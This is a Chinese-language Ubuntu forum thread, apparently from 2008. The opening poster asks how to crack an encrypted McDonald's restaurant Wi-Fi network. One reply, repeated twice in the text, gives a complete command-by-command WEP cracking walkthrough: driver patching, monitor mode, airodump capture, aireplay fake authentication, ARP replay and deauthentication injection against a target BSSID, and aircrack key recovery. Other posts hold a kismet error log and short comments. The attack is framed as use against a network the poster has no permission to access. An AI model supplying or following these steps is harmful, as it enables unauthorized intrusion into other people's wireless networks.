如何在UBUNTU LINUX下破解无线网!
- 九天星
- 帖子: 1440
- 注册时间: 2007-07-14 20:45
如何在UBUNTU LINUX下破解无线网!
如题:今天去麦当劳吃汉堡,拿出笔记本,发现其无线网是经过加密的,请问:如何在UBUNTU下破解其无线网?有知道的请留言!
另:LINUX中的安全工具如airodump类的在源里好像没有,郁闷!
另:LINUX中的安全工具如airodump类的在源里好像没有,郁闷!
-
- 帖子: 1994
- 注册时间: 2007-05-06 10:12
sudo gedit /etc/apt/sources.list
加入
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf hardy free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf hardy free non-free
保存文件、退出编辑器。敲入如下命令:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
完成后,为Madwifi驱动打补丁。
这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications……
我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:
sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci
如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。
sudo gedit /etc/kismet/kismet.conf
把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。
现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。
sudo airmon start ath0
sudo kismet
找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。
接下来运行airodump。
sudo airodump ath0 filename channel# 1
文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。
从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。
接下来我们想开始注入数据包。
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:
sudo aireplay -0 ath0 -a BSSID ath0
否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。
sudo aircrack filename.ivs
一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。
加入
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf hardy free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf hardy free non-free
保存文件、退出编辑器。敲入如下命令:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
完成后,为Madwifi驱动打补丁。
这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications……
我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:
sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci
如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。
sudo gedit /etc/kismet/kismet.conf
把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。
现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。
sudo airmon start ath0
sudo kismet
找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。
接下来运行airodump。
sudo airodump ath0 filename channel# 1
文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。
从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。
接下来我们想开始注入数据包。
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:
sudo aireplay -0 ath0 -a BSSID ath0
否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。
sudo aircrack filename.ivs
一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。
上次由 xeoc 在 2008-07-21 20:32,总共编辑 2 次。
- qiang_liu8183
- 论坛版主
- 帖子: 10699
- 注册时间: 2006-09-10 22:36
- 系统: Arch Debian
- 来自: 北京
- 九天星
- 帖子: 1440
- 注册时间: 2007-07-14 20:45
KISMET安装上去后如何执行?在程序里找不到,打开终端执行命令也不行。出现如下提示
Launching kismet_server: //usr/bin/kismet_server
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
Enabling channel hopping.
Enabling channel splitting.
Source 0 (madwifi): Enabling monitor mode for madwifi_ag source interface ath0 channel 6...
ERROR: Unable to create VAP: No such device
ERROR: Unable to create monitor-mode VAP
WARNING: ath0 appears to not accept the Madwifi-NG controls. Will attempt to configure it as a standard Madwifi-old interface. If you are using madwifi-ng, be sure to set the source interface to the wifiX control interface, NOT athX
FATAL: GetIFFlags: interface ath0: No such device
debug - open failed: /sys/class/net/ath0/device/ No such file or directory
Done.
Launching kismet_server: //usr/bin/kismet_server
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
Enabling channel hopping.
Enabling channel splitting.
Source 0 (madwifi): Enabling monitor mode for madwifi_ag source interface ath0 channel 6...
ERROR: Unable to create VAP: No such device
ERROR: Unable to create monitor-mode VAP
WARNING: ath0 appears to not accept the Madwifi-NG controls. Will attempt to configure it as a standard Madwifi-old interface. If you are using madwifi-ng, be sure to set the source interface to the wifiX control interface, NOT athX
FATAL: GetIFFlags: interface ath0: No such device
debug - open failed: /sys/class/net/ath0/device/ No such file or directory
Done.
-
- 帖子: 1994
- 注册时间: 2007-05-06 10:12
-
- 帖子: 2
- 注册时间: 2008-07-18 19:28
-
- 帖子: 1994
- 注册时间: 2007-05-06 10:12
-
- 帖子: 2
- 注册时间: 2008-12-20 14:49
Re: 如何在UBUNTU LINUX下破解无线网!
LZ以后去星巴克吧, 那里无加密.
-
- 帖子: 3681
- 注册时间: 2008-05-03 23:42
Re: 如何在UBUNTU LINUX下破解无线网!
我以前做过没成功 ...
凯撒/rms 成功过吗?
凯撒/rms 成功过吗?
-
- 帖子: 10
- 注册时间: 2008-05-16 21:08
-
- 帖子: 49
- 注册时间: 2007-11-05 23:52
Re: 如何在UBUNTU LINUX下破解无线网!
主要你的网卡 支持监听 anywlan论坛
- playeryang
- 帖子: 249
- 注册时间: 2009-04-04 12:55
- 来自: 四川...泸州||江苏...镇江
-
- 帖子: 295
- 注册时间: 2009-05-20 18:26
Re: 如何在UBUNTU LINUX下破解无线网!
破解有前提,是WEP加密才能破解,,要是WPA的话,就有困难了,呵呵